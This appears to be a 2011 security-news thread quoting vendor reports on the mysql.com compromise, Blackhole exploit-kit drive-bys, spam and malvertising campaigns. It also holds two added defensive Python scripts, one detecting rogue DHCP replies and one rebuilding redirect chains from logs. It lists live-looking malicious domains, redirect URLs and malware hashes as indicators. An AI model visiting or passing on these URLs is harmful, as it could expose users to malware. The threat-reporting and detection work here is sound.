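def audit_reply(pkt: bytes, trusted_servers: set, trusted_dns: set) -> list:
    """Flag an OFFER/ACK whose server identifier or advertised DNS is off the allowlist."""
    opts = parse_options(pkt)
    if opts.get(OPT_MSG_TYPE, b"\x00")[0] not in (2, 5):  # 2 = OFFER, 5 = ACK
        return []
    server = (ip_list(opts.get(OPT_SERVER_ID, b"")) or ["missing"])[0]
    alerts = []
    if server not in trusted_servers:
        alerts.append(f"rogue DHCP server identifier {server}")
    for dns in ip_list(opts.get(OPT_DNS, b"")):
        if dns not in trusted_dns:
            alerts.append(f"untrusted DNS server {dns} pushed by {server}")
    return alerts


def build_offer(server_ip: str, client_ip: str, dns_ips: list) -> bytes:
    """Build a minimal DHCPOFFER so the audit can run offline (constructed data)."""
    header = struct.pack("!BBBBIHH", 2, 1, 6, 0, 0x3903F326, 0, 0)  # op=BOOTREPLY
    header += bytes(4) + IPv4Address(client_ip).packed + IPv4Address(server_ip).packed + bytes(4)
    header += bytes(16 + 64 + 128)  # chaddr, sname, file left empty
    opts = bytes([OPT_MSG_TYPE, 1, 2, OPT_SERVER_ID, 4]) + IPv4Address(server_ip).packed
    opts += bytes([OPT_DNS, 4 * len(dns_ips)]) + b"".join(IPv4Address(d).packed for d in dns_ips)
    return header + MAGIC_COOKIE + opts + bytes([OPT_END])


TRUSTED_SERVERS = {"192.168.1.1"}
TRUSTED_DNS = {"192.168.1.1"}
# A lease from the real gateway, and a Rorpian-style lease from an infected peer
# that points DNS at an outside host (203.0.113.7 is a documentation address
# standing in for the attacker's resolver; the real one is not given here).
LEGIT_OFFER = build_offer("192.168.1.1", "192.168.1.50", ["192.168.1.1"])
ROGUE_OFFER = build_offer("192.168.1.77", "192.168.1.50", ["203.0.113.7"])

if __name__ == "__main__":
    for name, pkt in (("legit", LEGIT_OFFER), ("rogue", ROGUE_OFFER)):
        print(name, audit_reply(pkt, TRUSTED_SERVERS, TRUSTED_DNS) or "clean")
```

On a real network the same audit runs over captured replies (UDP source port 67) instead of the constructed packets.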


2011-09-26, 22:42

mysql.com hacked - malware served to visitors...
- http://blog.armorize.com/2011/09/mysqlcom-hacked-infecting-visitors-with.html
9.26.2011 - "Our HackAlert 24x7 Website malware monitoring platform today indicated that mysql.com has been hacked...
Step 1: http ://www .mysql .com
Causes the visiting browser to load the following:
Step 2: http ://mysql .com /common/js/s_code_remote.js?ver=20091011...
Step 3: http ://falosfax .in/info/in.cgi?5&ab_iframe=1&ab_badtraffic=1&antibot_hash=1255098964&ur=1&HTTP_REFERER=http ://mysql .com/
Throws out a 302 redirect to Step 4.
Step 4: http ://truruhfhqnviaosdpruejeslsuy .cx.cc/main.php
This domain hosts the BlackHole exploit pack. It exploits the visitor's browsing platform (the browser, the browser plugins like Adobe Flash, Adobe PDF, etc, Java, ...), and upon successful exploitation, permanently installs a piece of malware into the visitor's machine, without the visitor's knowledge. The visitor doesn't need to click or agree to anything; simply visiting mysql .com with a vulnerable browsing platform will result in an infection.
Currently, 9 out of 44 vendors on VirusTotal* can detect this piece of malware."
(More detail at the armorize URL above.)

* http://www.virustotal.com/file-scan/report.html?id=d761babcb55d21b467dd698169c921995bf58eac5e9912596693fee52c8690a1-1317040603
File name: w.php
Submission date: 2011-09-26 20:23:24 (UTC)
Result: 9/44 (20.5%)
There is a more up-to-date report...
- https://www.virustotal.com/file-scan/report.html?id=d761babcb55d21b467dd698169c921995bf58eac5e9912596693fee52c8690a1-1317260745
File name: e1d511259779f6a02f2a61cfedc2551ec70885b6.bin
Submission date: 2011-09-29 01:45:45 (UTC)
Result: 28/43 (65.1%)

- https://krebsonsecurity.com/2011/09/mysql-com-sold-for-3k-serves-malware/
Monday, September 26th, 2011 at 3:52 pm - "... it appears the malicious scripts were injected into the site sometime within the last seven hours. If that’s accurate, that was enough time for approximately 120,000 Internet users to browse the site and expose their systems to the exploit kit..."
> http://www.alexa.com/search?q=mysql.com&r=home_home&p=bigtop

- https://www.computerworld.com/s/article/9220295/MySQL.com_hacked_to_serve_malware
September 26, 2011 03:19 PM ET - "... Armorize noticed the problem at around 5 a.m. Pacific Time Monday. Hackers had installed JavaScript code that threw a variety of known browser attacks at visitors to the site, so those with out-of-date browsers or unpatched versions of Adobe Flash, Reader or Java on their Windows PCs could have been quietly infected with malicious software. By just after 11 a.m., the issue had been cleaned up, said Wayne Huang, Armorize's CEO..."

- https://isc.sans.edu/diary.html?storyid=11638
Last Updated: 2011-09-26 21:50:32 UTC – “… now been cleaned up on mysql .com but no further words on the scope of the compromise. It also appears to be the second time this year*. In the last incident, SQL injection was used to gain access to the information on the site.”
* https://www.scmagazineus.com/oracles-mysqlcom-hacked-via-sql-injection/article/199419/
March 28, 2011
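The four-step chain above (trusted page, injected script, third-party 302, exploit-kit landing) is exactly the shape a defender can pull back out of proxy logs by linking each request to the request that referred or redirected to it. This is an added example, not code from Armorize or any source quoted here; the log lines are constructed to mirror the chain described, and the six-field layout (time, client, status, url, referer, location) is this example's own rather than a real proxy format.

```python
"""Reconstruct browser redirect chains from proxy logs (added example).

Constructed data: the log lines mirror the four-step chain Armorize describes;
the field layout (time client status url referer location) is this example's
own, not a real proxy format.
"""
from urllib.parse import urlparse

LOG = """\
1317040100 10.0.0.5 200 http://www.mysql.com/ - -
1317040101 10.0.0.5 200 http://mysql.com/common/js/s_code_remote.js?ver=20091011 http://www.mysql.com/ -
1317040102 10.0.0.5 302 http://falosfax.in/info/in.cgi?5&ab_iframe=1 http://www.mysql.com/ http://truruhfhqnviaosdpruejeslsuy.cx.cc/main.php
1317040103 10.0.0.5 200 http://truruhfhqnviaosdpruejeslsuy.cx.cc/main.php - -
1317040110 10.0.0.9 200 http://www.mysql.com/ - -
1317040111 10.0.0.9 200 http://www.mysql.com/downloads/ http://www.mysql.com/ -
"""


def parse_log(text: str) -> list:
    """One dict per request; '-' marks an absent referer or Location header."""
    rows = []
    for line in text.splitlines():
        ts, client, status, url, referer, location = line.split()
        rows.append({"ts": int(ts), "client": client, "status": int(status), "url": url,
                     "referer": None if referer == "-" else referer,
                     "location": None if location == "-" else location})
    return rows


def build_chains(rows: list) -> dict:
    """Return {client: [chain, ...]}, each chain a list of rows from first page to last hop.

    A request is linked to the latest earlier request it was referred from, or
    that answered with a 3xx whose Location matches its URL.
    """
    chains = {}
    for client in sorted({r["client"] for r in rows}):
        mine = sorted((r for r in rows if r["client"] == client), key=lambda r: r["ts"])
        parent = {}
        for i, r in enumerate(mine):
            for j in range(i - 1, -1, -1):
                p = mine[j]
                if r["referer"] == p["url"] or (p["status"] in (301, 302) and p["location"] == r["url"]):
                    parent[i] = j
                    break
        leaves = sorted(set(range(len(mine))) - set(parent.values()))
        client_chains = []
        for leaf in leaves:
            chain, i = [], leaf
            while i is not None:
                chain.append(mine[i])
                i = parent.get(i)
            client_chains.append(chain[::-1])
        chains[client] = client_chains
    return chains


def suspicious_chains(rows: list, watched_hosts: set, min_hosts: int = 3) -> list:
    """Flag chains that start on a watched (trusted, high-traffic) site, contain a
    3xx hop and span at least `min_hosts` distinct hosts: a trusted page that
    bounces the browser through strangers is the injection/malvertising pattern."""
    hits = []
    for client, client_chains in build_chains(rows).items():
        for chain in client_chains:
            hosts = [urlparse(r["url"]).hostname for r in chain]
            redirected = any(r["status"] in (301, 302) for r in chain)
            if hosts[0] in watched_hosts and redirected and len(set(hosts)) >= min_hosts:
                hits.append((client, hosts))
    return hits
```

Run over real logs, the flagged host sequence is what you hand to the site owner and to blocklisting; the second client, who only browsed mysql.com pages, produces no hit.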


2011-09-28, 13:56

Malicious emails with subject “ACH Payment xxxxx Canceled”
- http://community.websense.com/blogs/securitylabs/archive/2011/09/28/malicious-emails-with-subject-ach-payment-xxxxx-canceled.aspx
28 Sep 2011 01:00 AM - "Have you got an email with subject “ACH Payment xxxxx Canceled” ? Please don’t open the url in the email. Because it will take you to a malicious url. Websense... has detected that an email campaign broke out on 27th September, 2011. In this campaign, all the emails with the subject “ACH Payment xxxxxx Canceled”, xxxx means random numbers generated from spammers. Each email in this campaign has one same url, after being clicked, victims will be led to various malicious links, via redirection, finally downloaded trojan files without any notice... Now we can see there is an iframe in its payload, it will lead you to redirect to another malicious url. That malicious url hosts blackhole exploit kit, which is the most widely used exploit kit. It will download a Zbot file, which has been confirmed by VirusTotal*... more than 200,000 messages in this campaign..."
* https://www.virustotal.com/file-scan/report.html?id=8ccaf0c60797a663d1360af83e99f92522ddc977ec5510cbaf29ffefe6a225fc-1317198424
File name: calc[1].ex_e
Submission date: 2011-09-28 08:27:04 (UTC)
Result: 29/43 (67.4%)
There is a more up-to-date report...
- https://www.virustotal.com/file-scan/report.html?id=8ccaf0c60797a663d1360af83e99f92522ddc977ec5510cbaf29ffefe6a225fc-1317334191
File name: 13172629856976457567
Submission date: 2011-09-29 22:09:51 (UTC)
Result: 29/42 (69.0%)

- http://labs.m86security.com/2011/09/an-analysis-of-the-ach-spam-campaign/
September 6, 2011


2011-09-28, 20:22

How to get infected with malware...
- https://www.csis.dk/en/csis/news/3321
2011-09-27 - "When a Microsoft Windows machine gets infected by viruses/malware it does so mainly because users forget to update the Java JRE, Adobe Reader/Acrobat and Adobe Flash... CSIS has over a period of almost three months actively collected real time data from various so-called exploit kits. An exploit kit is a commercial hacker toolbox that is actively exploited by computer criminals who take advantage of vulnerabilities in popular software. Up to 85 % of all virus infections occur as a result of drive-by attacks automated via commercial exploit kits. The purpose of this study is to reveal precisely how Microsoft Windows machines are infected with the virus/malware and which browsers, versions of Windows and third-party software are at risk. We have monitored more than 50 different exploit kits on 44 unique servers/IP addresses... The statistical material covers all in all more than half a million user exposures out of which as many as 31.3 % were infected with the virus/malware due to missing security updates... On the basis of the total statistical data of this study it is documented that the following products are frequently abused by malware in order to infect Windows machines: Java JRE, Adobe Reader/Acrobat, Adobe Flash and Microsoft Internet Explorer... The conclusion of this study is that as much as 99.8 % of all virus/malware infections caused by commercial exploit kits are a direct result of the lack of updating five specific software packages*..."
* https://www.csis.dk/images/infection.Png

> https://www.csis.dk/images/browser.Png

> https://www.csis.dk/images/os.Png


2011-09-29, 16:38

More bad ads in Bing
- http://sunbeltblog.blogspot.com/2011/09/more-bad-ads-in-bing.html
September 29, 2011 - "... they're back again - this time promoting fake Firefox downloads whose ads are displayed when searching for... "Firefox download"... they missed a trick there, advertising Firefox 6 instead of the freshly minted Firefox 7. The URLs involved are hotelcrystalpark(dot)com/firefox_1 and firefox(dot)dl-labs(dot)com, with the rogue downloads being hosted at the dl-labs URL. VirusTotal score* currently gives us 6/43, with VIPRE detecting this as Trojan.Win32.Kryptik.cqw (v)..."
* https://www.virustotal.com/file-scan/report.html?id=1417e815b627d079f3809a941904781b947345e9e5cfd59dd563ebc5c772c285-1317230589
File name: firefox_6.s0.1.exe_
Submission date: 2011-09-28 17:23:09 (UTC)
Result: 6/43 (14.0%)
There is a more up-to-date report...
- https://www.virustotal.com/file-scan/report.html?id=1417e815b627d079f3809a941904781b947345e9e5cfd59dd563ebc5c772c285-1318368926
File name: firefox_6.s0.1.exe_
Submission date: 2011-10-11 21:35:26 (UTC)
Current status: finished
Result: 27/43 (62.8%)


2011-10-02, 03:14

Fake pharma domains suspended
- http://www.theregister.co.uk/2011/09/30/nominet_suspends_fake_pharma_addresses/
30 September 2011 - "Nominet, the .uk address registry, has suspended hundreds of internet domain names as part of a global police crackdown on crime gangs peddling fake pharmaceuticals. Operation Pangea IV saw almost 13,500 websites taken down and dozens of suspects arrested in 81 countries, according to Interpol, which coordinated the swoop. Over 2.4 million potentially harmful counterfeit pills, worth about £4m, were seized in raids between 20 and 27 of September, Interpol said. Confiscated medicines included everything from diet pills to anti-cancer drugs. Cops worked with customs agencies, ISPs, payment processors and delivery companies to close down the allegedly criminal operations, Interpol said. In the UK, Nominet acted upon advice given by the Medicines and Healthcare products Regulatory Agency and the Police Central e-Crime Unit to suspend about 500 .uk domains..."


2011-10-06, 12:39

Facebook malvertisement leads to Exploits
- http://blog.trendmicro.com/facebook-malvertisement-leads-to-exploits/
Oct. 4, 2011 - "... We encountered an infection chain wherein the user is led from a page within Facebook to a couple of ad sites then, finally, to a page that hosts exploits. When we traced the connection between the ad sites and Facebook, we found that the ad providers were affiliated with a certain Facebook application. We checked out the said application and found that it is indeed ad supported. We were able to come up with the likely infection chain... Upon accessing the application, the malvertisement gets loaded, triggering a series of redirections. The redirections finally lead to a malicious site, which then loads several exploits, particularly those related to Java and ActiveX:
• CVE-2006-0003: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0003
• CVE-2010-4452: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4452
• CVE-2010-1423: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1423
The exploits were loaded to download more malicious files although we weren’t able to trace these anymore since the URLs they accessed were already inaccessible... Malvertisements are considered grave threats, especially since much like website compromises, attacks related to these usually involve trusted sites that users already typically visit without risk of system infection..."
(More detail at the trendmicro URL above.)


2011-10-06, 14:11

Halloween malware, scares, scams ...
- http://community.websense.com/blogs/securitylabs/archive/2011/10/05/first-wave-of-halloween-scare.aspx
5 Oct 2011 - "... malware authors have already concocted a brew of early scares: blackhat SEO, fake Adobe Flash notification, and a malicious file download... start with the search term "halloween skeleton templates," which brings up a poisoned search result. The link redirects users to what appears to be a fake YouTube site... The fake YouTube site uses nude images of celebrities like Emma Watson and Paris Hilton as a ploy. These, along with salacious captions, are meant to entice users into playing the apparent video. When users click any of the links on the page, they are prompted to update Adobe Flash Player... Users who fall for the trick are prompted to download a malicious file called scandsk.exe, identified by 15/43 VirusTotal* engines..."
* https://www.virustotal.com/file-scan/report.html?id=0716b10d60f7f82b28d04c81654f64a37069354b66da3a2082f3619860c9d774-1317839174
File name: scandsk.exe
Submission date: 2011-10-05 18:26:14 (UTC)
Result: 15/43 (34.9%)
There is a more up-to-date report...
- https://www.virustotal.com/file-scan/report.html?id=0716b10d60f7f82b28d04c81654f64a37069354b66da3a2082f3619860c9d774-1318022043
File name: afe4e70aa3210b8b04c53330d6037378a0aeaf7f.bin
Submission date: 2011-10-07 21:14:03 (UTC)
Result: 21/43 (48.8%)


2011-10-07, 15:22

Blackhole Exploit + Rogue AV capitalizes on Steve Jobs' passing
- http://community.websense.com/blogs/securitylabs/archive/2011/10/06/blackhole-exploit-rogue-av-capitalizes-on-steve-jobs-passing.aspx
6 Oct 2011 - "Websense... has detected malicious email messages claiming that the late Apple founder and CEO, Steve Jobs, is still alive... Some of the email subjects used in this attack include:
Steve Jobs: Not Dead Yet!
Steve Jobs Alive!
Steve Jobs Not Dead
The email messages contain links to compromised web sites that redirect to Blackhole Exploit Kit and install Rogue AV malware. The malicious file used in this attack is poorly detected by AV engines*. As always, don't click on links in emails you didn't expect to receive, they tend to be bad news."
(Screenshots available at the websense URL above.)
* https://www.virustotal.com/file-scan/report.html?id=545de2c3a1f0d50949da842601fa699fb741efc9baef6b22c99192923d80f19c-1317941431
File name: contacts.exe
Submission date: 2011-10-06 22:50:31 (UTC)
Result: 5/43 (11.6%)
There is a more up-to-date report...
- https://www.virustotal.com/file-scan/report.html?id=545de2c3a1f0d50949da842601fa699fb741efc9baef6b22c99192923d80f19c-1318232093
File name: worms.exe
Submission date: 2011-10-10 07:34:53 (UTC)
Current status: finished
Result: 18/43 (41.9%)

Facebook scammers exploit Steve Jobs' death
- http://nakedsecurity.sophos.com/2011/10/06/steve-jobs-death-facebook-scam/
6 October 2011

Malicious SPAM...
- http://blog.trendmicro.com/steve-jobs-proclaimed-alive-by-spam/
Oct. 7, 2011

- http://labs.m86security.com/2011/10/steve-jobs-alive-spam-campaign-leads-to-exploit-page/
October 7, 2011


2011-10-12, 18:28

Virus outbreak in Progress...
- http://www.ironport.com/toc/
October 12, 2011

> http://tools.cisco.com/security/center/threatOutbreak.x?i=77

Fake IRS Arrears Document E-mail Messages - October 12, 2011
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=24284
Malicious Link E-mail Messages - October 12, 2011
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=24350
Fake Online Reservation Status E-mail Messages - October 12, 2011
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=24351
Fake FedEx Package Delivery Failure E-mail Messages - October 12, 2011
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=24349